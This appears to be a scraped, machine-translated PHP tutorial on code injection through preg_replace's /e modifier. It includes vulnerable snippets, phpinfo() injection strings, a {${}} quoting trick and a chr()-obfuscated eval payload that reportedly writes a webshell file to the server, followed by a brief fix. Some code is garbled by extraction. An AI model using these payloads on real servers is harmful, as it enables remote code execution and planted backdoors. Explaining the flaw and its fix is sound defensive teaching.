Use preg_replace's dangerous /e modifier with caution (commonly used for backdoors in one sentence)

Home

Backend Development

PHP Tutorial

Use preg_replace's dangerous /e modifier with caution (commonly used for backdoors in one sentence)_PHP Tutorial

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 21, 2016 pm 03:05 PM

replacefunctionDangerprototypeCommonly usedof

preg_replace function prototype:

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

Special instructions:
/e modifier causes preg_replace() to treat the replacement argument as PHP code (after appropriate backreference replacement). Tip: Make sure that replacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace().
Example:

Copy code The code is as follows:

 
preg_replace (" /(?)(w+)([^>]*>)/e", 
"1.strtoupper(2).3", 
$html_body); 
?> ; 

This will make all HTML tags in the input string uppercase.

Security threat analysis:
Usually the subject parameter is generated by the client, and the client may construct malicious code, for example:

Copy Code The code is as follows:

 
echo preg_replace("/test/e",$_GET["h"],"jutst test"); 
?>

If we submit ?h=phpinfo(), phpinfo() will be executed (using the /e modifier, preg_replace will treat the replacement parameter as PHP code implement).
What happens if we submit the following code?
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr( 112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47) .chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39) .chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr (101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr (84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39 ).chr(41).chr(59))
The plaintext corresponding to the ciphertext is: fputs(fopen(data/a.php,w), );
The execution result is to generate a one-sentence Trojan file a.php in the /data/ directory.

Another difficult example:

Copy code The code is as follows:

 
function test($str) 
{ 
} 
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test(" 1")', $_GET["h"]); 
?> 

Submit?h=[php]phpinfo()[/php], phpinfo() Will it be enforced?
Definitely not. Because after regular matching, the replacement parameter becomes 'test("phpinfo")', and phpinfo is only used as a string parameter at this time.
Is there any way to make it execute?

Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
In PHP, if there is a variable in double quotes, the PHP interpreter will replace it with the result of variable interpretation; variables in single quotes will not be processed.
Note: Functions enclosed in double quotes will not be executed and replaced.

Here we need to construct a special variable through {${}}, 'test("{${phpinfo()}}")', to achieve the effect of having the function executed (${ phpinfo()} will be interpreted and executed).
You can do the following test first:

Copy the code The code is as follows:

echo "{${phpinfo ()}}";

phpinfo will be executed successfully.

How to prevent this vulnerability?
Change 'test("1")' to "test('1')" so that '${phpinfo()}' will be treated as an ordinary string (variables in single quotes will not be processed).

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

How to calculate the total number of elements in a PHP multidimensional array?May 15, 2025 pm 09:00 PM

Calculating the total number of elements in a PHP multidimensional array can be done using recursive or iterative methods. 1. The recursive method counts by traversing the array and recursively processing nested arrays. 2. The iterative method uses the stack to simulate recursion to avoid depth problems. 3. The array_walk_recursive function can also be implemented, but it requires manual counting.

What are the characteristics of do-while loops in PHP?May 15, 2025 pm 08:57 PM

In PHP, the characteristic of a do-while loop is to ensure that the loop body is executed at least once, and then decide whether to continue the loop based on the conditions. 1) It executes the loop body before conditional checking, suitable for scenarios where operations need to be performed at least once, such as user input verification and menu systems. 2) However, the syntax of the do-while loop can cause confusion among newbies and may add unnecessary performance overhead.

How to hash strings in PHP?May 15, 2025 pm 08:54 PM

Efficient hashing strings in PHP can use the following methods: 1. Use the md5 function for fast hashing, but is not suitable for password storage. 2. Use the sha256 function to improve security. 3. Use the password_hash function to process passwords to provide the highest security and convenience.

How to implement array sliding window in PHP?May 15, 2025 pm 08:51 PM

Implementing an array sliding window in PHP can be done by functions slideWindow and slideWindowAverage. 1. Use the slideWindow function to split an array into a fixed-size subarray. 2. Use the slideWindowAverage function to calculate the average value in each window. 3. For real-time data streams, asynchronous processing and outlier detection can be used using ReactPHP.

How to use the __clone method in PHP?May 15, 2025 pm 08:48 PM

The __clone method in PHP is used to perform custom operations when object cloning. When cloning an object using the clone keyword, if the object has a __clone method, the method will be automatically called, allowing customized processing during the cloning process, such as resetting the reference type attribute to ensure the independence of the cloned object.

How to use goto statements in PHP?May 15, 2025 pm 08:45 PM

In PHP, goto statements are used to unconditionally jump to specific tags in the program. 1) It can simplify the processing of complex nested loops or conditional statements, but 2) Using goto may make the code difficult to understand and maintain, and 3) It is recommended to give priority to the use of structured control statements. Overall, goto should be used with caution and best practices are followed to ensure the readability and maintainability of the code.

How to implement data statistics in PHP?May 15, 2025 pm 08:42 PM

In PHP, data statistics can be achieved by using built-in functions, custom functions, and third-party libraries. 1) Use built-in functions such as array_sum() and count() to perform basic statistics. 2) Write custom functions to calculate complex statistics such as medians. 3) Use the PHP-ML library to perform advanced statistical analysis. Through these methods, data statistics can be performed efficiently.

How to use anonymous functions in PHP?May 15, 2025 pm 08:39 PM

Yes, anonymous functions in PHP refer to functions without names. They can be passed as parameters to other functions and as return values of functions, making the code more flexible and efficient. When using anonymous functions, you need to pay attention to scope and performance issues.

See all articles